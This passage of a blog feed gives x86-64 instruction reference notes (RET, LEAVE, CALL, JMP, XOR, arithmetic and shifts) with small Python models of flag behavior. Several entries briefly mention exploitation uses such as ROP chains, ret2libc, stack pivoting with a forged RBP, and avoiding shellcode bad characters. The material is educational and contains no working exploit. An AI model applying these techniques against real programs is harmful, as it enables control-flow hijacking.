inc r/m8
inc r/m16
inc r/m32
inc r/m64
```
### Behavioral Characteristics
- Does not modify CF (unlike ADD x,1)
- Modifies flags such as ZF, SF, PF, OF, and AF
- Very fast operation, but when used in arithmetic, pay attention to OF
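
The note about OF can be made concrete with a small model. This is only a sketch for 32-bit operands; `inc32` and its return shape are hypothetical names chosen for the example.

```python
MOD = 2 ** 32
SIGN = 2 ** 31


def inc32(value, cf):
    """Model `inc r/m32`: returns (result, flags) with CF passed through."""
    value %= MOD
    result = (value + 1) % MOD
    flags = {
        "CF": cf,                        # untouched, unlike `add x, 1`
        "ZF": int(result == 0),
        "SF": result // SIGN,            # top bit of the result
        "OF": int(value == SIGN - 1),    # 0x7FFFFFFF + 1 overflows to 0x80000000
    }
    return result, flags


print(inc32(0x7FFFFFFF, 0))   # signed overflow: OF is set
print(inc32(0xFFFFFFFF, 0))   # unsigned wrap-around: CF stays as it was
```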

### Common Uses
- Incrementing loop counters
- Auto-incrementing stack variables and pointers
- Gradually accumulating when constructing numbers
- Constructing data byte-by-byte with offsets in certain encoders/decryptors</content:encoded></item><item><title>RET</title><link>https://goosequill.erina.top/en/blog/202511225446/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225446/</guid><description>Notes on importing RET</description><pubDate>Sat, 22 Nov 2025 11:54:00 GMT</pubDate><content:encoded>##  RET (ret)

### Basic purpose
RET pops the return address from the top of the stack and jumps to it; it is the exit instruction used when a function finishes execution.
Equivalent behavior:
```
pop rip
```
Immediate version:
```
ret 8
```
Equivalent to:
```
pop rip
add rsp, 8
```
Used by callee-cleanup calling conventions (for example, 32-bit `stdcall`) to remove arguments from the stack.
### Instruction execution process
1. Read the return address from the memory at `[RSP]` and load it into RIP
2. Increase RSP by 8 (x64), plus `imm16` for the `ret imm16` form
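
The two steps can be sketched in Python with a dictionary standing in for stack memory. Everything here (`ret`, the addresses, the dictionary layout) is a hypothetical model for illustration, not how a debugger or emulator exposes it.

```python
def ret(memory, rsp, imm16=0):
    """Model `ret` / `ret imm16` in 64-bit mode: returns (new_rip, new_rsp)."""
    rip = memory[rsp]   # read the return address at the top of the stack
    rsp += 8            # pop it
    rsp += imm16        # `ret imm16` additionally releases imm16 bytes
    return rip, rsp


# Made-up stack contents: the return address followed by two caller slots.
stack = {0x7FF0: 0x401136, 0x7FF8: 0x1111, 0x8000: 0x2222}

rip, rsp = ret(stack, 0x7FF0)
print(hex(rip), hex(rsp))

rip, rsp = ret(stack, 0x7FF0, 8)
print(hex(rip), hex(rsp))
```

Because the target comes straight from `memory[rsp]`, whoever controls that slot controls where execution continues.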

### Instruction format
```
ret
ret imm16
```
### Behavioral characteristics
- The jump target is determined entirely by the stack contents
    
- Does not modify EFLAGS
    
- Is the core trampoline of &lt;mark&gt;ROP attacks&lt;/mark&gt;
    
- If the return address is overwritten, program control flow is hijacked
### Common uses
- Function return
- Gadgets in a ROP chain
- Constructing attack patterns such as ret2libc and ret2plt
- Implementing lightweight jumps in shellcode</content:encoded></item><item><title>LEAVE</title><link>https://goosequill.erina.top/en/blog/202511225340/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225340/</guid><description>Import notes for LEAVE</description><pubDate>Sat, 22 Nov 2025 11:53:00 GMT</pubDate><content:encoded>##  LEAVE (leave)

### Basic purpose
LEAVE is used to restore the stack frame from before a function call, equivalent to cleaning up local variables and restoring the old RBP.
Equivalent behavior:
```
mov rsp, rbp
pop rbp
```
### Instruction execution process
1. Write the value of RBP into RSP (discard the local variable area)
2. Pop the old RBP from the stack
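
A small Python model of these two steps, with a dictionary standing in for stack memory. The function name `leave` and the addresses are illustrative assumptions.

```python
def leave(memory, rsp, rbp):
    """Model `leave`: `mov rsp, rbp` followed by `pop rbp`. Returns (rsp, rbp)."""
    rsp = rbp            # discard the local variable area
    rbp = memory[rsp]    # pop the saved frame pointer
    rsp += 8
    return rsp, rbp


# Made-up frame: saved RBP at 0x7FE0, return address right above it.
stack = {0x7FE0: 0x8010, 0x7FE8: 0x401136}

rsp, rbp = leave(stack, 0x7FC0, 0x7FE0)
print(hex(rsp), hex(rbp))
```

After the call, RSP points at the return address slot, which is exactly what a following `ret` consumes.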

### Instruction format
```
leave
```
### Behavioral characteristics
- &lt;mark&gt;Single-byte instruction&lt;/mark&gt;
- A common epilogue before a function returns
- Shorter and faster than writing the two instructions manually when cleaning up a stack frame
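- In overflows: when the saved RBP has been overwritten, `leave` pops that &quot;fake RBP&quot; into RBP; a second `leave` (for example, in the caller&apos;s epilogue) then copies it into RSP, which pivots the stack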
### Common uses
- Standard function tail: `push rbp` → … → `leave`
- Very clear for debugging stack frames
- In PWN, RBP can be forged to hijack the destination of the subsequent RET</content:encoded></item><item><title>TEST</title><link>https://goosequill.erina.top/en/blog/202511225125/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225125/</guid><description>Import notes for TEST</description><pubDate>Sat, 22 Nov 2025 11:51:00 GMT</pubDate><content:encoded>##  TEST (test)

### Basic function
The TEST instruction performs a bitwise AND on two operands, but **does not store the result; it only updates the flags**.  
It is commonly used for conditional checks, such as testing whether a register is 0 or whether a certain bit is set.
Logical behavior:
```
temp = op1 &amp; op2     ; the result is discarded
update EFLAGS        ; flags are set according to temp
```
### Instruction execution process
- Perform bitwise AND
- Do not write back the result (discard it)
- Update the flags:
    - CF = 0
    - OF = 0
    - ZF depends on whether the result is 0
    - SF is determined by the highest bit of the result
    - PF is set when the low 8 bits of the result contain an even number of 1 bits
    - AF is undefined

### Instruction format
```
test r/m32, r32
test r/m64, r64
test r/m32, imm32
test r/m8,  imm8
```
### Behavioral characteristics
- It is the &quot;no-result version&quot; of logical AND
- Commonly used to test whether a certain bit is 1
- Does not modify operands (non-destructive)
- Especially suitable for branch checks and state analysis

Difference from AND:
- `and op1, op2` writes the result back to op1
- `test op1, op2` does not modify any operand at all; it only affects the flags

Equivalent behavior example (logically equivalent):
```
and temp, op1, op2     ; assume temp is a hypothetical scratch register
; update EFLAGS according to temp
; temp is discarded
```
### Common uses
- Test whether a register is 0:
    ```
    test eax, eax     ; equivalent to checking whether eax is 0
    jz   is_zero
    ```
- Check whether a certain bit is set:
    ```
    test rax, 0x100
    jnz  bit_set
    ```
- Test whether a pointer is null or whether a flag bit is valid
- Protocol parsing (bitwise decomposition of flag fields)
- In reverse engineering analysis, it often appears in permission checks or state branches
- In PWN debugging, it is often used to understand whether validation logic has been bypassed

### Small example: test whether eax is even
```
test eax, 1
jz   even
```
Principle: lowest bit is 0 → even number.

---</content:encoded></item><item><title>CALL</title><link>https://goosequill.erina.top/en/blog/202511224434/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511224434/</guid><description>Import notes on CALL</description><pubDate>Sat, 22 Nov 2025 11:44:00 GMT</pubDate><content:encoded>##  CALL (call)

### Basic purpose
CALL is used to invoke a function by jumping to the target location to execute code while saving the return address so execution can return to the call site when the function finishes.
### Instruction execution process
1. Push the address of the instruction following the current instruction (the return address) onto the stack

2. Set RIP to the call target address

3. Begin executing the new code path

Equivalent behavior (x64):
```
push rip_next
jmp target
```
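
The same push-then-jump behavior can be sketched in Python, with a dictionary standing in for stack memory. The function name `call` and all addresses are illustrative assumptions.

```python
def call(memory, rsp, rip_next, target):
    """Model a near `call` in 64-bit mode: returns (new_rip, new_rsp)."""
    rsp -= 8                  # make room on the stack
    memory[rsp] = rip_next    # push the return address
    return target, rsp        # continue at the call target


stack = {}
rip, rsp = call(stack, 0x8000, 0x401005, 0x401100)
print(hex(rip), hex(rsp), hex(stack[rsp]))
```

The value stored at the new RSP is the one a later `ret` will load back into RIP.
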
### Instruction formats

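```
call rel32            ; relative call (most common)
call rax              ; register-indirect call
call [rax]            ; memory-indirect call
call qword ptr [...]  ; memory-indirect call with an explicit 64-bit operand (absolute target)
```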

### Behavioral characteristics

- Modifies RSP (pushes the return address)
- Modifies RIP (jumps)
- Does not modify EFLAGS
- Changes to the stack structure have a major impact on PWN
- An important node for constructing ROP chains and hijacking control flow

### Common uses

- Calling functions
- Dynamically resolving addresses at run time (the call/pop technique pops the pushed return address to learn the current position)
- Control-flow obfuscation (using call to enter an intermediate stub)
- Changing the return address during overflow exploitation</content:encoded></item><item><title>JMP</title><link>https://goosequill.erina.top/en/blog/202511223708/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511223708/</guid><description>Import notes for JMP</description><pubDate>Sat, 22 Nov 2025 11:37:00 GMT</pubDate><content:encoded>## JMP (jmp)

### Basic function
JMP &lt;mark&gt;unconditionally jumps to the specified address&lt;/mark&gt; (immediate value, register, or memory address).  
It overwrites RIP and is one of the most fundamental control-flow instructions.
### Instruction execution process
- Write the target address into RIP
- Unconditionally transfer execution to the new location
- Does not modify EFLAGS

### Instruction format
```
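jmp rel32           ; relative jump
jmp rax             ; register-indirect jump
jmp [rax]           ; memory-indirect jump
jmp qword ptr [...] ; memory-indirect jump with an explicit 64-bit operand (absolute target)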
```
### Behavioral characteristics
- Does not return
- Does not affect registers (except &lt;mark&gt;RIP, the instruction pointer&lt;/mark&gt;)
- Used for control-flow transfer and tail-call optimization
- **Heavily used in PWN** for:
    - Hijacking control flow (`ret2text` / `ret2csu` / `ret2shellcode`)
    - Jumps in ROP gadgets
    - Overwriting function pointers for exploitation

### Common uses
- Implementing loops and branches
- Jump tables and state machines
- Hooking/patching control flow
- ROP chain construction
- Exploiting stack overflows to hijack execution flow into shellcode
---</content:encoded></item><item><title>SHR</title><link>https://goosequill.erina.top/en/blog/202511223622/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511223622/</guid><description>Import notes for SHR</description><pubDate>Sat, 22 Nov 2025 11:36:00 GMT</pubDate><content:encoded>##  SHR (shr)

### Basic purpose
SHR (logical right shift) shifts the operand right by n bits, filling the left side with 0s.  
Mathematically, for unsigned values: `dest = floor(dest / 2^n)`.
### Instruction execution process
- Shift right the specified number of times
- Fill the left side with 0s
- Update CF, ZF, SF, and PF; OF is defined only for 1-bit shifts
- The last shifted-out bit → CF

### Instruction format
```
shr r/m32, imm8
shr r/m64, imm8
shr r/m32, cl
shr r/m64, cl
```
### Behavioral characteristics
- Does not preserve the sign → not suitable for signed division
- Commonly used for unsigned integers
- Clearly different from SAR (SAR preserves the sign in the highest bit)
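
To make the contrast with SAR concrete, here is a minimal Python sketch of both shifts on 32-bit values. The names `shr32` and `sar32` are assumptions, and the sketch only accepts shift counts from 1 to 31.

```python
MOD = 2 ** 32
SIGN = 2 ** 31


def shr32(value, count):
    """Logical right shift: returns (result, CF). Count must be in 1..31."""
    if count not in range(1, 32):
        raise ValueError("count must be in 1..31 for this sketch")
    value %= MOD
    result = value // 2 ** count            # zeros enter from the left
    cf = value // 2 ** (count - 1) % 2      # last bit shifted out
    return result, cf


def sar32(value, count):
    """Arithmetic right shift: the sign bit is replicated from the left."""
    if count not in range(1, 32):
        raise ValueError("count must be in 1..31 for this sketch")
    value %= MOD
    signed = value - MOD if value // SIGN else value
    result = (signed // 2 ** count) % MOD   # floor division keeps the sign
    cf = value // 2 ** (count - 1) % 2
    return result, cf


print([hex(x) for x in shr32(0xFFFFFFF0, 4)])
print([hex(x) for x in sar32(0xFFFFFFF0, 4)])
```

For the bit pattern of -16, SHR yields a large positive number while SAR yields the pattern of -1, which is why only SAR suits signed division by powers of two.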

### Common uses
- Fast division by 2^n (unsigned)
- Bitmask cleanup
- Right-shifting fields in protocol parsing
- Patch points in certain encryption/encoding algorithms
---</content:encoded></item><item><title>SHL</title><link>https://goosequill.erina.top/en/blog/202511223500/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511223500/</guid><description>Import notes for SHL</description><pubDate>Sat, 22 Nov 2025 11:35:00 GMT</pubDate><content:encoded>##  SHL (shl)

### Basic function
SHL (Shift Logical Left) shifts the destination operand left by n bits, filling the right side with 0s.  
In *mathematical terms*, it is equivalent to: `dest = dest * 2^n`, truncated to the operand width.
### Instruction execution process
- Shift left the specified number of times
- Fill the right side with 0s
- Update flags such as CF, ZF, SF, and OF
- The last bit shifted out → CF

### Instruction format
```
shl r/m32, imm8
shl r/m64, imm8
shl r/m32, cl
shl r/m64, cl
```
### Behavioral characteristics
- Logical operation; does not consider the sign
- Performs fast multiplication on values
- Has a strong effect on flags, especially CF and OF
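
A rough Python model of the truncation and the carry-out, assuming a 32-bit operand and a shift count from 1 to 31; the name `shl32` is made up for the example.

```python
MOD = 2 ** 32


def shl32(value, count):
    """Logical left shift: returns (result, CF). Count must be in 1..31."""
    if count not in range(1, 32):
        raise ValueError("count must be in 1..31 for this sketch")
    value %= MOD
    wide = value * 2 ** count    # untruncated product
    result = wide % MOD          # keep the low 32 bits
    cf = wide // MOD % 2         # last bit shifted out of bit 31
    return result, cf


print(shl32(3, 4))
print([hex(x) for x in shl32(0xC0000001, 1)])
```

The second call shows the multiplication analogy breaking down: the top bit falls off into CF and the stored result is no longer `value * 2`.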

### Common uses
- Quickly multiply by 2^n
- Address calculation (such as structure base address offsets)
- Bitmap construction
- In ROP/shellcode, &lt;mark&gt;construct large numbers&lt;/mark&gt;

---</content:encoded></item><item><title>NOT</title><link>https://goosequill.erina.top/en/blog/202511223359/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511223359/</guid><description>Import notes for NOT</description><pubDate>Sat, 22 Nov 2025 11:33:00 GMT</pubDate><content:encoded>##  NOT (not)

### Basic function
NOT performs a bitwise inversion on the operand: `dest = ~dest`.  
That is, all bits 0 → 1, and 1 → 0.
### Instruction execution process
- Invert each bit
- Write the result back to the destination operand
- Does **not affect** any flags in EFLAGS

### Instruction format
```
not r/m8
not r/m16
not r/m32
not r/m64
```
### Behavioral characteristics
- Single-operand instruction
- Does not modify flags
- Can be used to construct values, encryption, and mask processing
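
As an illustration on 32-bit values, the sketch below models `not` and shows the usual identity that negation equals bitwise inversion plus one. The names `not32` and `neg32` are assumptions made for this example.

```python
MOD = 2 ** 32


def not32(value):
    """Model `not r/m32`: invert all 32 bits."""
    return ~value % MOD


def neg32(value):
    """Two's complement negation built from NOT: -x == (~x) + 1."""
    return (not32(value) + 1) % MOD


print(hex(not32(0x0000FFFF)))
print(hex(neg32(5)))
```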

### Common uses
- Constructing special immediates (with XOR, ADD, etc.)
- Implementing two&apos;s complement relationships in logical operations
- Reversing all bits for verification and algorithm analysis
- Avoiding the direct appearance of certain bytes in shellcode

---</content:encoded></item><item><title>XOR</title><link>https://goosequill.erina.top/en/blog/202511222527/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222527/</guid><description>Import notes for XOR</description><pubDate>Sat, 22 Nov 2025 07:25:00 GMT</pubDate><content:encoded>##  XOR (xor)

### Basic Function
The XOR instruction performs a bitwise exclusive OR on two operands: `dest = dest XOR src`.  
If the corresponding bits are the same, the result is 0; if they are different, the result is 1.  
After execution, EFLAGS is updated.
### Instruction Execution Process
- Compute the XOR result
- Write the result back to the destination operand
- Update flags such as ZF, SF, and PF
- CF and OF are cleared to 0

### Instruction Format
```
xor r/m32, r32
xor r/m64, r64
xor r/m32, imm32
xor r/m64, imm32
```
### Behavioral Characteristics

- XOR REG, REG → &lt;mark&gt;clears the register to zero (a classic fast zeroing method)&lt;/mark&gt;
- Does not produce a carry
- Commonly used in &lt;mark&gt;encryption/obfuscation logic&lt;/mark&gt; (for example, RC4)
- Fast and compact in encoding; one of the most common bitwise operations
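
Two of these properties are easy to check in Python: a value XORed with itself is zero, and applying the same key twice restores the original data. The helper `xor_bytes` and the repeating-key scheme are illustrative assumptions (a toy encoder, not RC4 itself).

```python
def xor_bytes(data, key):
    """XOR every byte of `data` with a repeating `key`."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


eax = 0x12345678
print(eax ^ eax)   # the idea behind `xor eax, eax`

encoded = xor_bytes(b"flag{demo}", b"\x5a\xa5")
decoded = xor_bytes(encoded, b"\x5a\xa5")
print(encoded.hex(), decoded)
```

Because the operation is its own inverse, the same routine usually serves as both the encoder and the decoder.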

### Common Uses
- Clear a register: `xor eax, eax`
- Construct specific register values
- Obfuscation algorithms, encoders, and decryptors
- Used in shellcode to avoid badchars

---</content:encoded></item><item><title>OR</title><link>https://goosequill.erina.top/en/blog/202511222320/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222320/</guid><description>Import notes for OR</description><pubDate>Sat, 22 Nov 2025 07:23:00 GMT</pubDate><content:encoded>##  OR (or)

### Basic function
OR performs a bitwise logical OR operation:
```
x1 = x1 | x2
```
### Instruction format
```
or x1, x2
```
The same constraints as AND apply:
- x1 can be a register or memory
- x2 can be a register, memory, or an immediate value
- Memory-to-memory is not allowed
### Behavioral characteristics
- Used to set specific bits
- CF and OF are cleared
- If the result is 0 → ZF = 1, otherwise ZF = 0
### Examples
```
or eax, 1
; set the lowest bit

or rax, rbx
or byte ptr [rbp-8], 0x80   ; a memory/immediate form needs an explicit operand size
```
### Common uses
- Set flags or masks
- Merge flags
- Construct specific bitmaps

---</content:encoded></item><item><title>AND</title><link>https://goosequill.erina.top/en/blog/202511222215/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222215/</guid><description>Import notes for AND</description><pubDate>Sat, 22 Nov 2025 07:22:00 GMT</pubDate><content:encoded>##  AND (and)

### Basic function
AND performs a bitwise logical AND operation:
```
x1 = x1 &amp; x2
```
### Instruction format
```
and x1, x2
```
`x1` can be a register or memory  
`x2` can be a register, memory, or an immediate value  
but memory-to-memory is not allowed
### Behavioral characteristics
- Commonly used for bit clearing
- ZF is set if the result is all zeros
- OF and CF are cleared
- It never generates a carry, because it is a purely bitwise operation
### Example
```
and eax, 0xFF
; keep the low 8 bits

and rax, rbx
and dword ptr [rbp-0x8], 0x1   ; a memory/immediate form needs an explicit operand size
```
### Common uses
- Masking operations (for example, applying a /24 subnet mask to an IP address)
- Bit condition checking
- Alignment calculations (such as aligning an address to 4, 8, or 16 bytes)

For example, aligning to 16 bytes:

```
and rsp, -0x10
```
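
The alignment trick works because `-0x10` has its low four bits clear and every higher bit set. A small Python sketch, assuming a power-of-two alignment and using the hypothetical helper name `align_down` (`operator.and_` is the function form of bitwise AND):

```python
from operator import and_


def align_down(address, alignment):
    """Round `address` down to a multiple of `alignment` (a power of two)."""
    return and_(address, -alignment)   # same mask idea as `and rsp, -0x10`


rsp = 0x7FFFFFFFE4C8
aligned = align_down(rsp, 16)
print(hex(aligned))

# The mask gives the same answer as subtracting the remainder.
print(aligned == rsp - rsp % 16)
```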

---</content:encoded></item><item><title>IDIV-DIV</title><link>https://goosequill.erina.top/en/blog/202511222126/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222126/</guid><description>Import notes for IDIV-DIV</description><pubDate>Sat, 22 Nov 2025 07:21:00 GMT</pubDate><content:encoded>##  IDIV-DIV (idiv / div)

### Basic purpose
IDIV → signed division  
DIV → unsigned division  
Result layout (32-bit operands; RAX / RDX for 64-bit operands):
- Quotient → eax
- Remainder → edx

### IDIV instruction format (signed)
```
idiv r/m32
; edx:eax ÷ r/m32
; signed division
```
Before execution:
- Sign-extend EAX into EDX (the `cdq` instruction)
### DIV instruction format (unsigned)

```
div r/m8
; ax  ÷ r/m8
; al = quotient
; ah = remainder

div r/m32
; edx:eax ÷ r/m32
; eax = quotient
; edx = remainder
```
Note: before execution, `edx` must be cleared to zero (if the dividend is an unsigned dword).
### Behavioral characteristics
- Divisor is 0 → divide error exception (#DE)
- Quotient does not fit in the destination register → the same divide error (#DE)
- Implicitly uses registers (AL/AX/EAX/RAX and AH/DX/EDX/RDX)
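
A rough Python model of both instructions, assuming 32-bit operands. The names `div32` and `idiv32` are hypothetical, `div32` expects non-negative register values, and Python exceptions stand in for the CPU's divide error. `Fraction` is used only to get an exact quotient that truncates toward zero, since Python's `//` rounds toward negative infinity.

```python
from fractions import Fraction
from math import trunc

MOD = 2 ** 32


def div32(edx, eax, divisor):
    """Model unsigned `div r/m32`: returns (quotient, remainder)."""
    dividend = edx * MOD + eax
    quotient, remainder = divmod(dividend, divisor)   # ZeroDivisionError for 0
    if quotient // MOD:
        raise OverflowError("quotient does not fit in EAX")
    return quotient, remainder


def idiv32(dividend, divisor):
    """Model signed `idiv` on Python ints: the quotient truncates toward zero."""
    quotient = trunc(Fraction(dividend, divisor))
    remainder = dividend - quotient * divisor         # takes the dividend's sign
    return quotient, remainder


print(div32(0, 100, 7))
print(idiv32(-30, 4))
print(divmod(-30, 4))   # Python's floor division, shown for contrast
```

Forgetting to clear EDX before `div` corresponds to calling `div32` with a non-zero first argument, which can easily push the quotient out of range.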
    

### Examples
```
mov eax, 100
mov ecx, 7
xor edx, edx
div ecx
; eax = 14, edx = 2
```
Signed:
```
mov eax, -30
mov ecx, 4
cdq
idiv ecx
; eax = -7, edx = -2
```</content:encoded></item><item><title>IMUL-MUL</title><link>https://goosequill.erina.top/en/blog/202511222013/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222013/</guid><description>Import notes for IMUL-MUL</description><pubDate>Sat, 22 Nov 2025 07:20:00 GMT</pubDate><content:encoded>##  IMUL-MUL (imul / mul)

### Basic purpose
IMUL → signed multiplication  
MUL → unsigned multiplication
Both may involve a double-register result (EDX:EAX or RDX:RAX).

### IMUL instruction formats
There are three forms:
1. Implicit form (result stored in edx:eax)

```
imul r/m32
; EDX:EAX = EAX * r/m32 (signed)
```
2. Explicit two-operand form

```
imul reg, r/m32
; reg = reg * r/m32
```

3. Three-operand form

```
imul reg, r/m32, imm
; reg = r/m32 * imm
```

---

### MUL instruction format (unsigned)
```
mul r/m32      ; EDX:EAX = EAX * r/m32
```

MUL does not have an explicit `reg = reg × x` form.

### Behavioral characteristics
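- The high part of the result (EDX or RDX) determines overflow
- MUL: if the high part is not 0, OF = CF = 1
- IMUL: OF = CF = 1 when the full result is not the sign extension of its low half, that is, when the truncated result loses information
- The implicit form must use the accumulator register (EAX / RAX) as an operand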
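
The difference between the two overflow rules can be sketched in Python for the implicit 32-bit forms. The names `mul32`, `imul32`, and `to_signed` are assumptions made for this example; each function returns `(EDX, EAX, CF/OF)`.

```python
MOD = 2 ** 32
SIGN = 2 ** 31


def to_signed(value):
    """Interpret a 32-bit pattern as a two's complement integer."""
    value %= MOD
    return value - MOD if value // SIGN else value


def mul32(eax, operand):
    """Model unsigned `mul r/m32`: returns (edx, eax, cf_of)."""
    product = (eax % MOD) * (operand % MOD)
    high, low = divmod(product, MOD)
    return high, low, int(high != 0)


def imul32(eax, operand):
    """Model the implicit signed `imul r/m32`: returns (edx, eax, cf_of)."""
    product = to_signed(eax) * to_signed(operand)
    low = product % MOD
    high = product // MOD % MOD
    return high, low, int(to_signed(low) != product)


print([hex(x) for x in mul32(0xFFFFFFFF, 2)])
print([hex(x) for x in imul32(0xFFFFFFFF, 2)])
```

The same bit patterns overflow as an unsigned product but not as a signed one, because `0xFFFFFFFF` means -1 to IMUL and the result -2 still fits in 32 bits.
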
### Example
```
mov eax, 5
imul eax, 3      ; eax = 15

mov eax, -10
imul eax, -4     ; eax = 40 (signed multiplication)
```

Implicit form:
```
mov eax, 0x10000
imul dword ptr [rbp-4]  ; edx:eax = eax * [rbp-4]
```
### Common uses
- Mathematical calculations
- Array index calculation (`index × element_size`)
- Struct offset calculation

---</content:encoded></item><item><title>SUB</title><link>https://goosequill.erina.top/en/blog/202511221913/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221913/</guid><description>Import notes for SUB</description><pubDate>Sat, 22 Nov 2025 07:19:00 GMT</pubDate><content:encoded>##  SUB (sub)

### Basic function
The `SUB` instruction performs subtraction, writing the result of `x1 - x2` back to `x1`.
### Instruction format
```
sub x1, x2
x1 = x1 - x2
```
`x1` can be a register or memory; `x2` can be:
- Register
- Memory
- Immediate value

Restrictions:
- &lt;mark&gt; They cannot both be memory operands at the same time&lt;/mark&gt;

### Instruction execution process
```
x1 ← x1 - x2
EFLAGS ← updated according to the result
```
Affected flags:
- OF (signed overflow)
- SF (sign)
- ZF (whether the result is 0)
- CF (used to determine whether a borrow occurred)
- AF, PF

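How the main flags follow from a subtraction can be sketched in Python. The helper `sub_flags` below is hypothetical and only models CF, ZF, SF, and OF for a chosen operand width; AF and PF are left out to keep it short.

```python
def sub_flags(a, b, bits=32):
    """Model `sub a, b` on `bits`-wide operands; returns (result, flags)."""
    mod = 2**bits
    sign_bit = 2**(bits - 1)
    a %= mod
    b %= mod
    result = (a - b) % mod

    def signed(x):
        # Two's complement interpretation of an unsigned bit pattern.
        return x - mod if x >= sign_bit else x

    true_signed = signed(a) - signed(b)  # difference with unlimited precision
    flags = {
        "CF": int(b > a),                           # unsigned borrow
        "ZF": int(result == 0),                     # result is zero
        "SF": int(result >= sign_bit),              # top bit of the result
        "OF": int(true_signed != signed(result)),   # signed overflow
    }
    return result, flags


print(sub_flags(0, 1))           # borrow: CF and SF set
print(sub_flags(0x80000000, 1))  # most negative value minus 1: OF set
```

CF answers the unsigned question (did the subtraction borrow?), while OF answers the signed one (did the result leave the signed range?), which is why conditional jumps after `cmp`/`sub` come in unsigned and signed variants.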
### Example
```
sub eax, ebx
sub rax, 0x100
sub dword ptr [rbp-0x4], 1
```
### Equivalent expansion
```
sub rax, rbx
; equivalent to
tmp = rax - rbx
rax = tmp
update EFLAGS
```
### Common uses
- Decrementing, loop counting
- Allocating stack space by moving the stack pointer toward lower addresses (e.g. `sub rsp, 0x20`)
- Numeric computation
- Address offsetting (such as moving backward within a structure)

---</content:encoded></item><item><title>ADD</title><link>https://goosequill.erina.top/en/blog/202511221655/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221655/</guid><description>Import notes for ADD</description><pubDate>Sat, 22 Nov 2025 07:16:00 GMT</pubDate><content:encoded>## ADD (add)

### Basic function
The `ADD` instruction performs addition, writing the result of x1 + x2 into x1.  
At the same time, &lt;mark&gt;it affects multiple EFLAGS flags&lt;/mark&gt;.
### Instruction format
```
add x1, x2
x1 = x1 + x2
```
Operand types:
- `x1` (destination): register or memory
- `x2` (source): register, memory, or immediate value

`x1` and `x2` cannot both be memory operands.

### Instruction execution process
```
x1 ← x1 + x2
EFLAGS ← updated according to the result
```
The affected flags include:
- OF (overflow)
- SF (sign)
- ZF (zero)
- CF (carry)
- AF, PF

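All six flags listed above can be derived from the operands with ordinary integer arithmetic. The following Python sketch uses a hypothetical helper, `add_flags`, and assumes the operands are given as unsigned bit patterns of the chosen width.

```python
def add_flags(a, b, bits=32):
    """Model `add a, b` on `bits`-wide operands; returns (result, flags)."""
    mod = 2**bits
    sign_bit = 2**(bits - 1)
    a %= mod
    b %= mod
    total = a + b
    result = total % mod

    def signed(x):
        # Two's complement interpretation of an unsigned bit pattern.
        return x - mod if x >= sign_bit else x

    flags = {
        "CF": int(total >= mod),                             # carry out of the top bit
        "ZF": int(result == 0),                              # result is zero
        "SF": int(result >= sign_bit),                       # top bit of the result
        "OF": int(signed(a) + signed(b) != signed(result)),  # signed overflow
        "AF": int(a % 16 + b % 16 > 15),                     # carry out of bit 3
        "PF": int(bin(result % 256).count("1") % 2 == 0),    # even parity of low byte
    }
    return result, flags


print(add_flags(0xFFFFFFFF, 1))  # wraps to 0: CF and ZF set, OF clear
print(add_flags(0x7FFFFFFF, 1))  # signed overflow: OF and SF set, CF clear
```

The two calls show that CF and OF are independent: the first addition overflows only in the unsigned sense, the second only in the signed sense.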
### Example
```
add eax, ebx                ; register, register
add rax, 0x20               ; register, immediate
add dword ptr [rbp-0x4], 1  ; memory, immediate
```

### Equivalent expansion example
```
add rax, rbx
; equivalent to
tmp = rax + rbx
rax = tmp
update EFLAGS
```
### Common uses
- Pointer offset
- Incrementing, accumulation
- Integer arithmetic
- Constructing loop counters
- Stack address calculation (such as `add rsp, 0x20`)
    

---</content:encoded></item><item><title>LEA</title><link>https://goosequill.erina.top/en/blog/202511221611/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221611/</guid><description>Import notes for LEA</description><pubDate>Sat, 22 Nov 2025 07:16:00 GMT</pubDate><content:encoded>##  LEA (lea)

### Basic purpose
LEA (Load Effective Address) is used to compute and load the value of an &quot;effective address expression&quot; rather than access that memory address.  
It is essentially an arithmetic instruction, not a memory read instruction.
### Instruction format
```
lea rX, [address_expression]
rX = value of the expression inside [ ]
```
### Behavioral characteristics
- Does not access memory; only computes addresses
- Commonly used for pointer arithmetic
- Can replace some additions and multiplications by small constants (commonly used by compilers)
- Can implement the full expression: base + index × scale + displacement

### Examples
```
lea rbx, [rdx + rax*4 + 0x10]
; equivalent to:
rbx = rdx + rax*4 + 0x10
```
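The address expression is plain arithmetic, which a short Python sketch makes explicit. The function name `lea` and its keyword arguments are chosen for illustration; the scale check and the 64-bit wraparound reflect how x86-64 addressing works, but this is a model, not a decoder.

```python
def lea(base=0, index=0, scale=1, disp=0):
    """Compute base + index*scale + disp as a 64-bit value, without touching memory."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("scale must be 1, 2, 4, or 8")
    return (base + index * scale + disp) % 2**64


# lea rbx, [rdx + rax*4 + 0x10] with rdx = 0x1000 and rax = 3
print(hex(lea(base=0x1000, index=3, scale=4, disp=0x10)))

# lea rax, [rax + rax*2] multiplies rax by 3
print(lea(base=7, index=7, scale=2))
```

Because the scale is limited to 1, 2, 4, or 8, a single `lea` can multiply by 2, 3, 4, 5, 8, or 9 (using the same register as base and index), which is the pattern compilers exploit.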
### Common uses
- Pointer offset calculation
- Struct field offset calculation
- Fast addition/multiplication replacement (e.g. `lea rax, [rax+rax*2]` computes `rax*3`)
- Widely used in compiler optimizations to reduce arithmetic instructions
    

---</content:encoded></item><item><title>MOV</title><link>https://goosequill.erina.top/en/blog/202511221504/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221504/</guid><description>Import notes for MOV</description><pubDate>Sat, 22 Nov 2025 07:15:00 GMT</pubDate><content:encoded>## MOV

